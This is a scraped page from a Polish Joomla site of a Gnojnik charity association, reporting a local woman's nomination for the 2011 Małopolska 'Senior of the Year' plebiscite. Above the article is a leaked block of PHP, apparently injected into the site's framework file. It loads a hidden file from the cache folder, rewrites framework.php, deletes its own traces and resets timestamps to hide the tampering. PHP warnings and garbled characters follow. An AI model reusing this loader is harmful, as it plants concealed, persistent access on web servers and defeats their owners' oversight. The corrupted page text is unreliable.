$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 426
Pani Barbara Strzesak wśród nominowanych do tytułu SENIORA ROKU
 

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 372
Pani Barbara Strzesak wśród nominowanych do tytułu SENIORA ROKU

IMG2Regionalny Ośrodek Polityki Społecznej w Krakowie już po raz szósty organizował Małopolski Plebiscyt „Poza Stereotypem-Senior roku 2011.” Patronat honorowy nad tegorocznym Plebiscytem objęli Władysław Kosiniak – Kamysz Minister Pracy i Polityki Społecznej oraz Marek Sowa Marszałek Województwa Małopolskiego.

Tytuł „POZA STEREOTYPEM - Senior Roku 2011” mogła  otrzymać osoba, która będąc w wieku emerytalnym (minimalny wiek kandydata - 55 lat) i nieaktywną zawodowo: jest liderem społeczności lokalnej, aktywnie działa w organizacji pozarządowej, klubie seniora, uniwersytecie trzeciego wieku, grupie nieformalnej itp. ,bezinteresownie angażuje się w pomoc innym .

Nominację do tytułu "Senior Roku 2011" w VI Małopolskim Plebiscycie "Poza Stereotypem Senior Roku 2011" otrzymała Pani Barbara Strzesak –Przewodnicząca Klubu Seniora” Wrzos” , poetka ludowa z Gnojnika. Kandydaturę Pani Basi zgłosiło Stowarzyszenie „Pomocna Dłoń „ z Gnojnika. Stowarzyszenie poparło  kandydaturę Pani Basi  ,biorąc pod uwagę jej zaangażowanie w prace Stowarzyszenia i Klubu Seniora „WRZOS”

P1050782P1050786P1050809

 Rozstrzygnięcie Plebiscytu miało miejsce dn. 12 listopada br., podczas uroczystej gali w Pałacu Biskupa Erazma Ciołka w Krakowie. Tytuł Seniorki oraz Seniora Roku 2011 otrzymali: Danuta Kleszowska z Krakowa oraz Henryk Kozubski z Wieliczki,.

Pani Barbara Strzesak z Gnojnika znalazła się wśród grona 28 seniorów z Małopolski nominowanych do tego prestiżowego tytułu, co należy uznać za duże wyróżnienie. Należy zaznaczyć, iż każda z 28 nominowanych osób jest wyjątkowa, wzbudzająca ogromy podziw i szacunek..

Pani Barbara Strzesak urodziła się 19.11.1947 roku w Gnojniku. Pochodzi z typowej wiejskiej rodziny. Różne sytuacje losowe jej rodziny sprawiły ,z musiała wcześnie bardzo ciężko pracować w gospodarstwie rodziców. Ukończyła szkołę podstawową w Gnojniku. Potem kontynuowała naukę w typowej szkole rolniczej Już wówczas działała społecznie w Związku Młodzieży Wiejskiej.Po wyjściu za mąż  wraz ze swoim mężem stworzyli kochającą się rodzinę . Wychowali sześcioro dzieci .Doczekali się 14 wnuków.

Wraz z mężem bardzo aktywnie włączyła się do pracy społecznej w Ochotniczej Straży Pożarnej w Gnojniku. Obecnie jest Honorowym Członkiem OSP w Gnojniku. Pani Basia była członkiem Zespołu NASI. Działała czynnie w Radzie Parafialnej  , Radzie Sołeckiej.

Pani Barbara piszę wiersze , różne rymowanki , piosenki. Część wierszy zostało wydrukowanych w tomiku poezji wydanego przez Centrum Kultury w Gnojniku w ramach projektu „Jesteśmy najlepsi” .Projekt współfinansowany ze środków Unii Europejskiej.

Jest autorką hymnu Publicznej Szkoły Podstawowej w Gnojniku.

Uczestniczy regularnie w Czwartkowych Spotkaniach organizowanych comiesięcznie  przez Centrum Kultury w Gnojniku .

Mimo ,że przeżyła osobistą tragedię / śmierć córki , matki czwórki dzieci/ nadal zachowuje pogodę ducha, zaraża innych swoimi pomysłami. Prężnie działa w Klubie Seniora „Wrzos” w Gnojniku. Była jedną z inicjatorek powstania Klubu Seniora w Gnojniku.

Bieżę czynny udział w występach grupy śpiewaczej Klubu Seniora. Ich występy poznały osoby  z różnych stron Polski ,ponieważ regularnie co 2 tygodnie występują w Ośrodku Rehabilitacyjno-Wypoczynkowym EWA w Gnojniku umilając pobyt i leczenie przebywającym w ORW pacjentom.

Pani Barbara Strzesak  wiernie kultywuje tradycje naszego regionu we własnej rodzinie. Wzorowo wychowane dzieci  przekazują te wartości swoim pociechom.Mimo  swoich 65 lat życia nadal tryska energią , pogodą ducha  i olbrzymią chęcią dalszej działalności społecznej.

  • §Ideą Plebiscytu "Senior Roku" organizowanego od 6 lat przez Regionalny Ośrodek Polityki Społecznej w Krakowie jest promowanie i nagradzanie aktywnych seniorów, którzy nie zwracając uwagi na upływający czas realizują własne pasje, dają siebie innym, kreują otaczającą rzeczywistość.
  • §VI MAŁOPOLSKI PLEBISCYT „POZA STEREOTYPEM – senior roku 2011
    Plebiscyt pozwala wyłonić nietuzinkowych seniorów, którzy aktywnie działają w organizacjach pozarządowych, uniwersytetach trzeciego wieku czy są liderami lokalnych społeczności.
    Wśród nominowanych było 19 kobiet i 9 mężczyzn.
    Po wnikliwej analizie nadesłanych kandydatur, biorąc pod uwagę Regulamin, który pozwala przyznać dwa tytuły Seniora Roku i maksymalnie trzy wyróżnienia,

 

  • §Tytuł Seniora Roku 2011 Panu Henrykowi Kozubskiemu z Wieliczki, który w grudniu br. skończy 101 lat! Senior Roku 2011 dzięki swojej artystycznej pasji znany jest jako „Wielicki Chagall” .
  • §Tytuł Seniorki Roku 2011 Pani Danucie Kleszowskiej z Krakowa, która dzięki swojej bezinteresownej pracy znana jest całemu krakowskiemu środowisku emerytów i ren

Należy zaznaczyć, iż każda z 28 nominowanych osób jest wyjątkowa, wzbudzająca ogromy podziw i szacunek

 
Pomagaj razem z nami, moesz przekaza� swoj darowizne za po�rednictwem internetu
Pomoc ofiarom wypadkw komunikacyjnych
Projekty Aktywizujce
Zielone Ochronki
Spartakiady
Warsztaty Terapi Zajciowej w Zawadzie Uszewskiej
 

Copyright © Stowarzyszenie "Pomocna Do"